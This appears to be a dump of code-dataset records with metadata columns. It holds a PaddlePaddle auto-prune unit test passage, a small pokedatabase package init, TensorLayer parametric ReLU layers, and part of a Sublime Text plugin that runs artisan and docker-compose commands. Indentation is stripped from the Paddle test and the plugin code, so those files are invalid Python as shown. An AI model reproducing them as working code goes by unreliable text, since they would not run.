feature = self.fc(x)
label = self.fc2(label)
label = fluid.layers.cast(label, dtype="float32")
label = fluid.layers.cast(label, dtype='int64')
# Note that the label is not persistable in fluid.layers.cross_entropy.
loss = fluid.layers.cross_entropy(input=feature, label=label)
loss = fluid.layers.mean(loss)
return loss
class AutoPruneLayer3(fluid.Layer):
def __init__(self, name_scope):
super(AutoPruneLayer3, self).__init__(name_scope)
self.fc = fluid.dygraph.FC("FC1", size=20, act=None)
def forward(self, x, label, test_num):
feature = self.fc(x)
part1, part2 = fluid.layers.split(
feature, num_or_sections=[10, 10], dim=1)
# Note that: part2 is not used.
loss = fluid.layers.cross_entropy(input=part1, label=label)
loss = fluid.layers.mean(loss)
if test_num == 1:
return loss, part2
else:
return loss, part1, part2
class MyLayer(fluid.Layer):
def __init__(self, name_scope, vocab_size, size, dtype="float32"):
super(MyLayer, self).__init__(name_scope, dtype)
self.embed0 = fluid.Embedding(size=(vocab_size, size))
self.embed1 = fluid.Embedding(size=(vocab_size, size))
self.fc0 = fluid.FC(self.full_name(), size=size, dtype=dtype)
self.fc1 = fluid.FC(self.full_name(), size=size, dtype=dtype)
def forward(self, x):
# this method involves only the fc layers
loss = fluid.layers.reduce_mean(self.fc0(x) + self.fc1(x))
return loss
def linear0(self, x):
loss = fluid.layers.reduce_mean(self.fc0(x))
return loss
def embed_linear0(self, x):
loss = fluid.layers.reduce_mean(self.fc0(self.embed0(x)))
return loss
class MyLayer2(fluid.Layer):
def __init__(self, name_scope, vocab_size, size, dtype="float32"):
super(MyLayer2, self).__init__(name_scope, dtype)
self.embed0 = fluid.Embedding(size=(vocab_size, size))
self.embed1 = fluid.Embedding(size=(vocab_size, size))
self.fc0 = fluid.FC(self.full_name(), size=size, dtype=dtype)
self.fc1 = fluid.FC(self.full_name(), size=size, dtype=dtype)
def forward(self, indices):
# mind the difference with MyLayer
# In this example, the forward method involes all params
loss = fluid.layers.reduce_mean(
self.fc0(self.embed0(indices)) + self.fc1(self.embed1(indices)))
return loss
def linear0(self, x):
loss = fluid.layers.reduce_mean(self.fc0(x))
return loss
def embed_linear0(self, x):
loss = fluid.layers.reduce_mean(self.fc0(self.embed0(x)))
return loss
class TestImperativeAutoPrune(unittest.TestCase):
def test_auto_prune(self):
with fluid.dygraph.guard():
case1 = AutoPruneLayer0("l1")
value1 = np.arange(25).reshape(5, 5).astype("float32")
value2 = np.arange(25).reshape(5, 5).astype("float32")
v1 = fluid.dygraph.to_variable(value1)
v2 = fluid.dygraph.to_variable(value2)
loss = case1(v1, v2)
loss.backward()
self.assertTrue(case1.fc2.weight._grad_ivar() is not None)
self.assertTrue(case1.fc1.weight._grad_ivar() is not None)
def test_auto_prune2(self):
with fluid.dygraph.guard():
case2 = AutoPruneLayer1("l1")
value1 = np.arange(25).reshape(5, 5).astype("float32")
value2 = np.arange(25).reshape(5, 5).astype("float32")
v1 = fluid.dygraph.to_variable(value1)
v2 = fluid.dygraph.to_variable(value2)
loss = case2(v1, v2)
loss.backward()
self.assertTrue(case2.fc2.weight._grad_ivar() is None)
self.assertTrue(case2.fc1.weight._grad_ivar() is not None)
def test_auto_prune3(self):
with fluid.dygraph.guard():
case3 = AutoPruneLayer3("l3")
value1 = np.arange(784).reshape(1, 784).astype("float32")
value2 = np.arange(1).reshape(1, 1).astype("int64")
v1 = fluid.dygraph.to_variable(value1)
v2 = fluid.dygraph.to_variable(value2)
loss, part2 = case3(v1, v2, 1)
loss.backward()
self.assertTrue(case3.fc.weight._grad_ivar() is not None)
self.assertTrue((part2.gradient() == 0).all())
def test_auto_prune4(self):
with fluid.dygraph.guard():
case4 = AutoPruneLayer3("l3")
value1 = np.arange(784).reshape(1, 784).astype("float32")
value2 = np.arange(1).reshape(1, 1).astype("int64")
v1 = fluid.dygraph.to_variable(value1)
v2 = fluid.dygraph.to_variable(value2)
loss, part2 = case4(v1, v2, 1)
part2.backward()
self.assertTrue(case4.fc.weight._grad_ivar() is not None)
self.assertTrue((part2.gradient() == 1).all())
def test_auto_prune5(self):
with fluid.dygraph.guard():
case4 = AutoPruneLayer3("l3")
value1 = np.arange(784).reshape(1, 784).astype("float32")
value2 = np.arange(1).reshape(1, 1).astype("int64")
v1 = fluid.dygraph.to_variable(value1)
v2 = fluid.dygraph.to_variable(value2)
loss, part1, part2 = case4(v1, v2, 2)
part1.backward()
self.assertTrue(case4.fc.weight._grad_ivar() is not None)
self.assertTrue((part2.gradient() == 0).all())
def test_auto_prune6(self):
with fluid.dygraph.guard():
value0 = np.arange(26).reshape(2, 13).astype("float32")
value1 = np.arange(6).reshape(2, 3).astype("float32")
value2 = np.arange(10).reshape(2, 5).astype("float32")
fc = fluid.FC("fc1", size=5, dtype="float32")
fc2 = fluid.FC("fc2", size=3, dtype="float32")
a = fluid.dygraph.to_variable(value0)
b = fluid.dygraph.to_variable(value1)
c = fluid.dygraph.to_variable(value2)
out1 = fc(a)
out2 = fc2(b)
out1.stop_gradient = True
out = fluid.layers.concat(input=[out1, out2, c], axis=1)
out.backward()
self.assertTrue((fc.weight.gradient() == 0).all())
self.assertTrue((out1.gradient() == 0).all())
def test_auto_prune7(self):
with fluid.dygraph.guard():
value0 = np.arange(26).reshape(2, 13).astype("float32")
value1 = np.arange(6).reshape(2, 3).astype("float32")
value2 = np.arange(10).reshape(2, 5).astype("float32")
fc = fluid.FC("fc1", size=5, dtype="float32")
fc2 = fluid.FC("fc2", size=3, dtype="float32")
a = fluid.dygraph.to_variable(value0)
b = fluid.dygraph.to_variable(value1)
c = fluid.dygraph.to_variable(value2)
out1 = fc(a)
out2 = fc2(b)
out1.stop_gradient = True
out = fluid.layers.concat(input=[out1, out2, c], axis=1)
backward_strategy = fluid.dygraph.BackwardStrategy()
out.backward(backward_strategy)
self.assertTrue((fc.weight.gradient() == 0).all())
self.assertTrue((out1.gradient() == 0).all())
def test_auto_prune8(self):
with fluid.dygraph.guard():
value0 = np.arange(26).reshape(2, 13).astype("float32")
value1 = np.arange(6).reshape(2, 3).astype("float32")
value2 = np.arange(10).reshape(2, 5).astype("float32")
fc = fluid.FC("fc1", size=5, dtype="float32")
fc2 = fluid.FC("fc2", size=3, dtype="float32")
a = fluid.dygraph.to_variable(value0)
b = fluid.dygraph.to_variable(value1)
c = fluid.dygraph.to_variable(value2)
out1 = fc(a)
fc_origin = fc.weight.numpy()
out2 = fc2(out1)
fc2_origin = fc2.weight.numpy()
fc2.weight.stop_gradient = True
out2.backward()
optimizer = fluid.optimizer.SGD(
learning_rate=0.003,
parameter_list=(fc.parameters() + fc2.parameters()))
optimizer.minimize(out2)
self.assertTrue(np.array_equal(fc2_origin, fc2.weight.numpy()))
self.assertFalse(np.array_equal(fc_origin, fc.weight.numpy()))
def test_auto_prune9(self):
with fluid.dygraph.guard():
value0 = np.arange(26).reshape(2, 13).astype("float32")
value1 = np.arange(6).reshape(2, 3).astype("float32")
value2 = np.arange(10).reshape(2, 5).astype("float32")
fc = fluid.FC("fc1", size=5, dtype="float32")
fc2 = fluid.FC("fc2", size=3, dtype="float32")
a = fluid.dygraph.to_variable(value0)
b = fluid.dygraph.to_variable(value1)
c = fluid.dygraph.to_variable(value2)
out1 = fc(a)
fc_origin = fc.weight.numpy()
out2 = fc2(out1)
fc2_origin = fc2.weight.numpy()
out2.stop_gradient = True
out2.backward()
optimizer = fluid.optimizer.SGD(
learning_rate=0.003,
parameter_list=(fc.parameters() + fc2.parameters()))
optimizer.minimize(out2)
self.assertTrue(np.array_equal(fc2_origin, fc2.weight.numpy()))
self.assertTrue(np.array_equal(fc_origin, fc.weight.numpy()))
try:
fc2.weight.gradient()
except ValueError as e:
assert type(e) == ValueError
def test_auto_prune10(self):
with fluid.dygraph.guard():
value0 = np.arange(26).reshape(2, 13).astype("float32")
value1 = np.arange(6).reshape(2, 3).astype("float32")
value2 = np.arange(10).reshape(2, 5).astype("float32")
fc = fluid.FC("fc1", size=5, dtype="float32")
fc2 = fluid.FC("fc2", size=3, dtype="float32")
a = fluid.dygraph.to_variable(value0)
b = fluid.dygraph.to_variable(value1)
c = fluid.dygraph.to_variable(value2)
out1 = fc(a)
out2 = fc2(b)
out1.stop_gradient = True
out = fluid.layers.concat(input=[out1, out2, c], axis=1)
backward_strategy = fluid.dygraph.BackwardStrategy()
backward_strategy.sort_sum_gradient = True
out.backward(backward_strategy)
self.assertTrue((fc.weight.gradient() == 0).all())
self.assertTrue((out1.gradient() == 0).all())
def test_auto_prune_with_optimizer(self):
vocab_size = 100
size = 20
batch_size = 16
indices = np.random.randint(
low=0, high=100, size=(batch_size, 1)).astype("int64")
embed = np.random.randn(batch_size, size).astype("float32")
place = fluid.CPUPlace()
with fluid.dygraph.guard(place):
model = MyLayer("mylayer", vocab_size, size)
optimizer = fluid.optimizer.AdamOptimizer(
0.001, parameter_list=model.parameters())
grad_clip = fluid.dygraph_grad_clip.GradClipByGlobalNorm(0.001)
indices = fluid.dygraph.to_variable(indices)
emebd = fluid.dygraph.to_variable(embed)
dummy_loss = model(embed)
loss = model.embed_linear0(indices)
loss.backward()
_, params_grads = optimizer.minimize(loss, grad_clip=grad_clip)
for items in params_grads:
assert items[0].name is not model.embed1.weight.name
assert items[0].name is not model.fc1.weight.name
assert model.embed1.weight._grad_ivar() is None
assert model.fc1.weight._grad_ivar() is None
with fluid.dygraph.guard(place):
model = MyLayer2("mylayer", vocab_size, size)
optimizer = fluid.optimizer.AdamOptimizer(
0.001, parameter_list=model.parameters())
grad_clip = fluid.dygraph_grad_clip.GradClipByGlobalNorm(0.001)
indices = fluid.dygraph.to_variable(indices)
emebd = fluid.dygraph.to_variable(embed)
dummy_loss = model(indices)
loss = model.embed_linear0(indices)
loss.backward()
optimizer.minimize(loss, grad_clip=grad_clip)
for items in params_grads:
assert items[0].name is not model.embed1.weight.name
assert items[0].name is not model.fc1.weight.name
assert model.embed1.weight._grad_ivar() is None
assert model.fc1.weight._grad_ivar() is None
def test_case2_prune_no_grad_branch(self):
with fluid.dygraph.guard():
value1 = np.arange(784).reshape(1, 784)
value2 = np.arange(1).reshape(1, 1)
v1 = fluid.dygraph.to_variable(value1).astype("float32")
v2 = fluid.dygraph.to_variable(value2).astype("float32")
case3 = AutoPruneLayer2("l2")
loss = case3(v1, v2)
loss.backward()
self.assertTrue(case3.fc2.weight._grad_ivar() is None)
self.assertTrue(case3.fc.weight._grad_ivar() is not None)
def test_case2_prune_no_grad_branch(self):
with fluid.dygraph.guard():
value1 = np.arange(784).reshape(1, 784)
value2 = np.arange(1).reshape(1, 1)
v1 = fluid.dygraph.to_variable(value1).astype("float32")
v2 = fluid.dygraph.to_variable(value2).astype("float32")
case3 = AutoPruneLayer2("l2")
loss = case3(v1, v2)
loss.backward()
self.assertTrue(case3.fc2.weight._grad_ivar() is None)
self.assertTrue(case3.fc.weight._grad_ivar() is not None)
def test_case3_prune_no_grad_branch2(self):
with fluid.dygraph.guard():
value1 = np.arange(1).reshape(1, 1)
fc = fluid.dygraph.FC("FC1", size=1, act=None)
label = fluid.dygraph.to_variable(value1).astype("float32")
label = fc(label)
label = fluid.layers.cast(label, dtype="float32")
label = fluid.layers.cast(label, dtype='int64')
out = fluid.layers.one_hot(input=label, depth=100)
loss = fluid.layers.mean(out)
loss.backward()
self.assertTrue(fc.weight._grad_ivar() is None)
def test_case4_with_no_grad_op_maker(self):
with fluid.dygraph.guard():
out = fluid.layers.gaussian_random(shape=[20, 30])
loss = fluid.layers.mean(out)
loss.backward()
self.assertTrue(out._grad_ivar() is None)
if __name__ == '__main__':
unittest.main()
| 41.443902
| 79
| 0.595633
| 2,121
| 16,992
| 4.641207
| 0.121169
| 0.075579
| 0.048354
| 0.075985
| 0.80638
| 0.790532
| 0.768285
| 0.741061
| 0.705303
| 0.691284
| 0
| 0.049963
| 0.277954
| 16,992
| 409
| 80
| 41.545232
| 0.752384
| 0.047728
| 0
| 0.716374
| 0
| 0
| 0.025863
| 0
| 0
| 0
| 0
| 0
| 0.102339
| 1
| 0.090643
| false
| 0
| 0.008772
| 0
| 0.152047
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6ab86e039402a3c55af9b1900b089d188f8274c8
| 173
|
py
|
Python
|
pokedatabase_sdk/__init__.py
|
AlonsoMartinToledano/pokedatabase_sdk
|
128780817d0a1473859d5858e6708f945b26352a
|
[
"MIT"
] | null | null | null |
pokedatabase_sdk/__init__.py
|
AlonsoMartinToledano/pokedatabase_sdk
|
128780817d0a1473859d5858e6708f945b26352a
|
[
"MIT"
] | null | null | null |
pokedatabase_sdk/__init__.py
|
AlonsoMartinToledano/pokedatabase_sdk
|
128780817d0a1473859d5858e6708f945b26352a
|
[
"MIT"
] | null | null | null |
from pokedatabase_sdk.pokedatabase_sdk import pokemonNames
from pokedatabase_sdk.pokedatabase_sdk import gameNames
from pokedatabase_sdk.pokedatabase_sdk import requestsList
| 57.666667
| 58
| 0.919075
| 21
| 173
| 7.285714
| 0.333333
| 0.588235
| 0.372549
| 0.607843
| 0.784314
| 0.784314
| 0
| 0
| 0
| 0
| 0
| 0
| 0.063584
| 173
| 3
| 59
| 57.666667
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
6ac0fd75683317e29b7432666fe32ecdae80ec71
| 10,627
|
py
|
Python
|
tensorlayer/layers/activation.py
|
KuKuXia/tensorlayer
|
654de4a37892cde54495350f99f5f3b38b2c6eb3
|
[
"Apache-2.0"
] | null | null | null |
tensorlayer/layers/activation.py
|
KuKuXia/tensorlayer
|
654de4a37892cde54495350f99f5f3b38b2c6eb3
|
[
"Apache-2.0"
] | null | null | null |
tensorlayer/layers/activation.py
|
KuKuXia/tensorlayer
|
654de4a37892cde54495350f99f5f3b38b2c6eb3
|
[
"Apache-2.0"
] | null | null | null |
#! /usr/bin/python
# -*- coding: utf-8 -*-
import tensorflow as tf
from tensorlayer import logging
from tensorlayer.activation import leaky_relu6, leaky_twice_relu6
from tensorlayer.decorators import deprecated_alias
from tensorlayer.initializers import truncated_normal
from tensorlayer.layers.core import Layer
# from tensorlayer.layers.core import LayersConfig
__all__ = [
'PRelu',
'PRelu6',
'PTRelu6',
]
class PRelu(Layer):
"""
The :class:`PRelu` class is Parametric Rectified Linear layer.
It follows f(x) = alpha * x for x < 0, f(x) = x for x >= 0,
where alpha is a learned array with the same shape as x.
Parameters
----------
channel_shared : boolean
If True, single weight is shared by all channels.
in_channels: int
The number of channels of the previous layer.
If None, it will be automatically detected when the layer is forwarded for the first time.
a_init : initializer
The initializer for initializing the alpha(s).
name : None or str
A unique layer name.
Examples
-----------
>>> inputs = tl.layers.Input([10, 5])
>>> prelulayer = tl.layers.PRelu(channel_shared=True)
>>> print(prelulayer)
PRelu(channel_shared=True,in_channels=None,name=prelu)
>>> prelu = prelulayer(inputs)
>>> model = tl.models.Model(inputs=inputs, outputs=prelu)
>>> out = model(data, is_train=True)
References
-----------
- `Delving Deep into Rectifiers: Surpassing Human-Level Performance on ImageNet Classification <http://arxiv.org/abs/1502.01852>`__
- `Convolutional Deep Belief Networks on CIFAR-10 [A. Krizhevsky, 2010] <http://www.cs.utoronto.ca/~kriz/conv-cifar10-aug2010.pdf>`__
"""
def __init__(
self,
channel_shared=False,
in_channels=None,
a_init=truncated_normal(mean=0.0, stddev=0.1),
name=None # "prelu"
):
super(PRelu, self).__init__(name)
self.channel_shared = channel_shared
self.in_channels = in_channels
self.a_init = a_init
if self.channel_shared:
self.build((None, ))
self._built = True
elif self.in_channels is not None:
self.build((None, self.in_channels))
self._built = True
logging.info("PRelu %s: channel_shared: %s" % (self.name, self.channel_shared))
def __repr__(self):
s = ('{classname}(')
s += 'channel_shared={channel_shared},'
s += 'in_channels={in_channels},'
s += 'name={name}'
s += ')'
return s.format(classname=self.__class__.__name__, **self.__dict__)
def build(self, inputs_shape):
if self.channel_shared:
w_shape = (1, )
else:
w_shape = (inputs_shape[-1], )
self.alpha_var = self._get_weights("alpha", shape=w_shape, init=self.a_init)
self.alpha_var_constrained = tf.nn.sigmoid(self.alpha_var, name="constraining_alpha_var_in_0_1")
# @tf.function
def forward(self, inputs):
pos = tf.nn.relu(inputs)
self.alpha_var_constrained = tf.nn.sigmoid(self.alpha_var, name="constraining_alpha_var_in_0_1")
neg = -self.alpha_var_constrained * tf.nn.relu(-inputs)
return pos + neg
class PRelu6(Layer):
"""
The :class:`PRelu6` class is Parametric Rectified Linear layer integrating ReLU6 behaviour.
This Layer is a modified version of the :class:`PRelu`.
This activation layer use a modified version :func:`tl.act.leaky_relu` introduced by the following paper:
`Rectifier Nonlinearities Improve Neural Network Acoustic Models [A. L. Maas et al., 2013] <https://ai.stanford.edu/~amaas/papers/relu_hybrid_icml2013_final.pdf>`__
This activation function also use a modified version of the activation function :func:`tf.nn.relu6` introduced by the following paper:
`Convolutional Deep Belief Networks on CIFAR-10 [A. Krizhevsky, 2010] <http://www.cs.utoronto.ca/~kriz/conv-cifar10-aug2010.pdf>`__
This activation layer push further the logic by adding `leaky` behaviour both below zero and above six.
The function return the following results:
- When x < 0: ``f(x) = alpha_low * x``.
- When x in [0, 6]: ``f(x) = x``.
- When x > 6: ``f(x) = 6``.
Parameters
----------
channel_shared : boolean
If True, single weight is shared by all channels.
in_channels: int
The number of channels of the previous layer.
If None, it will be automatically detected when the layer is forwarded for the first time.
a_init : initializer
The initializer for initializing the alpha(s).
name : None or str
A unique layer name.
References
-----------
- `Delving Deep into Rectifiers: Surpassing Human-Level Performance on ImageNet Classification <http://arxiv.org/abs/1502.01852>`__
- `Rectifier Nonlinearities Improve Neural Network Acoustic Models [A. L. Maas et al., 2013] <https://ai.stanford.edu/~amaas/papers/relu_hybrid_icml2013_final.pdf>`__
- `Convolutional Deep Belief Networks on CIFAR-10 [A. Krizhevsky, 2010] <http://www.cs.utoronto.ca/~kriz/conv-cifar10-aug2010.pdf>`__
"""
def __init__(
self,
channel_shared=False,
in_channels=None,
a_init=truncated_normal(mean=0.0, stddev=0.1),
name=None # "prelu6"
):
super(PRelu6, self).__init__(name)
self.channel_shared = channel_shared
self.in_channels = in_channels
self.a_init = a_init
if self.channel_shared:
self.build((None, ))
self._built = True
elif self.in_channels is not None:
self.build((None, self.in_channels))
self._built = True
logging.info("PRelu6 %s: channel_shared: %s" % (self.name, self.channel_shared))
def __repr__(self):
s = ('{classname}(')
s += 'channel_shared={channel_shared},'
s += 'in_channels={in_channels},'
s += 'name={name}'
s += ')'
return s.format(classname=self.__class__.__name__, **self.__dict__)
def build(self, inputs_shape):
if self.channel_shared:
w_shape = (1, )
else:
w_shape = (inputs_shape[-1], )
self.alpha_var = self._get_weights("alpha", shape=w_shape, init=self.a_init)
self.alpha_var_constrained = tf.nn.sigmoid(self.alpha_var, name="constraining_alpha_var_in_0_1")
# @tf.function
def forward(self, inputs):
pos = tf.nn.relu(inputs)
pos_6 = -tf.nn.relu(inputs - 6)
neg = -self.alpha_var_constrained * tf.nn.relu(-inputs)
return pos + pos_6 + neg
class PTRelu6(Layer):
"""
The :class:`PTRelu6` class is Parametric Rectified Linear layer integrating ReLU6 behaviour.
This Layer is a modified version of the :class:`PRelu`.
This activation layer use a modified version :func:`tl.act.leaky_relu` introduced by the following paper:
`Rectifier Nonlinearities Improve Neural Network Acoustic Models [A. L. Maas et al., 2013] <https://ai.stanford.edu/~amaas/papers/relu_hybrid_icml2013_final.pdf>`__
This activation function also use a modified version of the activation function :func:`tf.nn.relu6` introduced by the following paper:
`Convolutional Deep Belief Networks on CIFAR-10 [A. Krizhevsky, 2010] <http://www.cs.utoronto.ca/~kriz/conv-cifar10-aug2010.pdf>`__
This activation layer push further the logic by adding `leaky` behaviour both below zero and above six.
The function return the following results:
- When x < 0: ``f(x) = alpha_low * x``.
- When x in [0, 6]: ``f(x) = x``.
- When x > 6: ``f(x) = 6 + (alpha_high * (x-6))``.
This version goes one step beyond :class:`PRelu6` by introducing leaky behaviour on the positive side when x > 6.
Parameters
----------
channel_shared : boolean
If True, single weight is shared by all channels.
in_channels: int
The number of channels of the previous layer.
If None, it will be automatically detected when the layer is forwarded for the first time.
a_init : initializer
The initializer for initializing the alpha(s).
name : None or str
A unique layer name.
References
-----------
- `Delving Deep into Rectifiers: Surpassing Human-Level Performance on ImageNet Classification <http://arxiv.org/abs/1502.01852>`__
- `Convolutional Deep Belief Networks on CIFAR-10 [A. Krizhevsky, 2010] <http://www.cs.utoronto.ca/~kriz/conv-cifar10-aug2010.pdf>`__
- `Rectifier Nonlinearities Improve Neural Network Acoustic Models [A. L. Maas et al., 2013] <https://ai.stanford.edu/~amaas/papers/relu_hybrid_icml2013_final.pdf>`__
"""
def __init__(
self,
channel_shared=False,
in_channels=None,
a_init=truncated_normal(mean=0.0, stddev=0.1),
name=None # "ptrelu6"
):
super(PTRelu6, self).__init__(name)
self.channel_shared = channel_shared
self.in_channels = in_channels
self.a_init = a_init
if self.channel_shared:
self.build((None, ))
self._built = True
elif self.in_channels:
self.build((None, self.in_channels))
self._built = True
logging.info("PTRelu6 %s: channel_shared: %s" % (self.name, self.channel_shared))
def __repr__(self):
s = ('{classname}(')
s += 'channel_shared={channel_shared},'
s += 'in_channels={in_channels},'
s += 'name={name}'
s += ')'
return s.format(classname=self.__class__.__name__, **self.__dict__)
def build(self, inputs_shape):
if self.channel_shared:
w_shape = (1, )
else:
w_shape = (inputs_shape[-1], )
# Alpha for outputs lower than zeros
self.alpha_low = self._get_weights("alpha_low", shape=w_shape, init=self.a_init)
self.alpha_low_constrained = tf.nn.sigmoid(self.alpha_low, name="constraining_alpha_low_in_0_1")
# Alpha for outputs higher than 6
self.alpha_high = self._get_weights("alpha_high", shape=w_shape, init=self.a_init)
self.alpha_high_constrained = tf.nn.sigmoid(self.alpha_high, name="constraining_alpha_high_in_0_1")
# @tf.function
def forward(self, inputs):
pos = tf.nn.relu(inputs)
pos_6 = -tf.nn.relu(inputs - 6) + self.alpha_high_constrained * tf.nn.relu(inputs - 6)
neg = -self.alpha_low_constrained * tf.nn.relu(-inputs)
return pos + pos_6 + neg
| 37.818505
| 170
| 0.645996
| 1,421
| 10,627
| 4.629134
| 0.153413
| 0.063241
| 0.038766
| 0.019155
| 0.849042
| 0.839617
| 0.819398
| 0.819398
| 0.815293
| 0.80526
| 0
| 0.02373
| 0.238637
| 10,627
| 280
| 171
| 37.953571
| 0.789272
| 0.479251
| 0
| 0.771654
| 0
| 0
| 0.101958
| 0.062028
| 0
| 0
| 0
| 0
| 0
| 1
| 0.094488
| false
| 0
| 0.047244
| 0
| 0.212598
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0a8f1e1e5b6305898bfc3e725cebdd0b723ce1da
| 14,752
|
py
|
Python
|
dlaravel.py
|
DevinY/dlaravel-alias
|
ddace8f57ca483a019355ea105bf6e0a17f64c55
|
[
"MIT"
] | 1
|
2018-09-04T09:04:43.000Z
|
2018-09-04T09:04:43.000Z
|
dlaravel.py
|
DevinY/dlaravel-alias
|
ddace8f57ca483a019355ea105bf6e0a17f64c55
|
[
"MIT"
] | null | null | null |
dlaravel.py
|
DevinY/dlaravel-alias
|
ddace8f57ca483a019355ea105bf6e0a17f64c55
|
[
"MIT"
] | null | null | null |
import sublime, sublime_plugin, re
from subprocess import Popen, PIPE, STDOUT
from threading import Thread
class PhpArtisanCommand(sublime_plugin.TextCommand):
def run(self, edit, **args):
self.window = self.view.window()
self.args = args
#len(self.window.folders())
#=====Check Project Folder===========
try:
file = self.window.extract_variables()['file']
dlaravel_folder = re.sub("^(.+?)(/sites/)(.+?)/(.+?)$", "\\1", file)
project_folder = re.sub("^(.+?)(/sites/)(.+?)/(.+?)$", "\\3", file)
folder = "{}/sites/{}".format(dlaravel_folder, project_folder)
except:
folder = self.window.extract_variables()['folder']
dlaravel_folder = re.sub("^(.+?)(/sites/)(.+?)$", "\\1", folder)
try:
dlaravel_release = open("{}/etc/dlaravel-release".format(dlaravel_folder),"r").read()
print("Project Folder: {}".format(folder))
print(dlaravel_release)
except:
print("Unable to find D-Laravel folder.")
print("You can download it at https://github.com/DevinY/dlaravel.")
self.window.run_command("show_panel", {"panel": "console", "toggle": True})
self.view.set_status("Dlaravel","Unable to find D-Laravel")
return False
self.view.set_status("Dlaravel", "artisan command will be run in {}".format(folder))
project_folder = re.sub("^(.+?)(/sites/)(.+?)$", "\\3", folder)
#===============================
def auto_complete_level2(*args):
if("route:l\t" in list(args) or "route:li\t" in list(args)):
self.window.show_input_panel("{} php artisan".format(project_folder),"route:list", on_done, None, None)
if("migrate:refresh\t" in list(args)):
self.window.show_input_panel("{} php artisan".format(project_folder),"migrate:refresh", on_done, None, None)
def auto_complete(*args):
#print(args)
if("mi\t" in list(args)):
self.window.show_input_panel("php artisan","migrate", on_done, auto_complete_level2, None)
if("ro\t" in list(args)):
self.window.show_input_panel("php artisan","route:", on_done, auto_complete_level2, None)
if("vi\t" in list(args)):
self.window.show_input_panel("php artisan","view", on_done, auto_complete_level2, None)
if("view:c\t" in list(args)):
self.window.show_input_panel("php artisan","view:clear", on_done, auto_complete_level2, None)
def run_command(*args):
dlaravel_project = re.sub(".*sites/(.+$)", "\\1", folder)
dlaravel_basepath = re.sub("(^.*)/sites/(.+$)", "\\1", folder)
parameter=""
for arg in list(args):
parameter=parameter+" {}".format(arg)
print('Command is issued (php artisan{}), Please wait...'.format(parameter))
command=["docker-compose","-f","{}/docker-compose.yml".format(dlaravel_basepath),"exec","-w","/var/www/html/{}".format(dlaravel_project),"-u","dlaravel","-T","php","php","artisan"]+list(args)
proc=Popen(command ,bufsize=0, stdout=PIPE,stderr=PIPE, universal_newlines=True);
output, error = proc.communicate()
proc.wait()
exit_code=proc.poll()
if(exit_code==0):
self.view.set_status("Dlaravel","composer{} is done.".format(parameter))
print(output)
print("Finished.")
else:
print("faild:{}".format(error))
def on_done( command ):
self.window.run_command("show_panel", {"panel": "console", "toggle": True})
this_thread = Thread(target=run_command, args=command.split())
this_thread.start()
self.window.show_input_panel("({}) php artisan".format(project_folder),"", on_done, auto_complete, None)
class PhpArtisanMigrateCommand(sublime_plugin.TextCommand):
def run(self, edit):
args="migrate"
self.window = self.view.window()
def run_command(*args):
args=list(args)
folder = self.window.extract_variables()['folder']
dlaravel_project = re.sub(".*sites/(.+$)", "\\1", folder)
dlaravel_basepath = re.sub("(^.*)/sites/(.+$)", "\\1", folder)
print('Command is issued (composer '+' '.join(args)+'), Please wait...')
command=["docker-compose","-f","{}/docker-compose.yml".format(dlaravel_basepath),"exec","-w","/var/www/html/{}".format(dlaravel_project),"-u","dlaravel","-T","php","php","artisan","migrate"]
proc=Popen(command ,bufsize=0, stdout=PIPE,stderr=PIPE, universal_newlines=True);
output, error = proc.communicate()
proc.wait()
exit_code=proc.poll()
if(exit_code==0):
self.view.set_status("Dlaravel","composer {} is done.".format(' '.join(args)))
print(output)
print("Finished.")
else:
print("{}".format(error))
self.window.run_command("show_panel", {"panel": "console", "toggle": True})
this_thread = Thread(target=run_command, args=args.split())
this_thread.start()
class ConsolePsCommand(sublime_plugin.TextCommand):
def run(self, edit):
self.window = self.view.window()
def run_command():
folder = self.window.extract_variables()['folder']
arg = "ps".split()
dlaravel_project = re.sub(".*sites/(.+$)", "\\1", folder)
dlaravel_basepath = re.sub("(^.*)/sites/(.+$)", "\\1", folder)
command=["docker-compose","--no-ansi","-f","{}/docker-compose.yml".format(dlaravel_basepath)]+arg
proc=Popen(command ,bufsize=1, stdout=PIPE,stderr=PIPE, universal_newlines=True);
output, error = proc.communicate()
proc.wait()
print(error)
if(proc.poll()==0):
self.view.set_status("Dlaravel", "console down Success" % command)
arg = "ps".split()
command=["docker-compose","-f","{}/docker-compose.yml".format(dlaravel_basepath)]+arg
proc=Popen(command ,bufsize=1, stdout=PIPE,stderr=PIPE, universal_newlines=True);
output = proc.communicate()[0]
print(output)
self.window.run_command("show_panel", {"panel": "console", "toggle": True})
else:
self.view.set_status("Dlaravel", "Error" % command)
print(error)
self.window.run_command("show_panel", {"panel": "console", "toggle": True})
self.window = self.view.window()
this_thread = Thread(target=run_command)
this_thread.start()
class DockerComposeCommand(sublime_plugin.TextCommand):
def run(self, edit, **args):
self.window = self.view.window()
folder = self.window.extract_variables()['folder']
def run_command(*args):
dlaravel_project = re.sub(".*sites/(.+$)", "\\1", folder)
dlaravel_basepath = re.sub("(^.*)/sites/(.+$)", "\\1", folder)
print("Command is issued (composer {})".format(' '.join(list(args))))
#print(type(args))
parameter=list(args)
if("exec" in args):
parameter=["exec","-T"]+parameter[1:]
if("up" in args):
parameter=parameter+["-d"]
command=["docker-compose","--no-ansi","-f","{}/docker-compose.yml".format(dlaravel_basepath)]+parameter
proc=Popen(command ,bufsize=0, stdout=PIPE,stderr=PIPE, universal_newlines=True);
output, error = proc.communicate()
proc.wait()
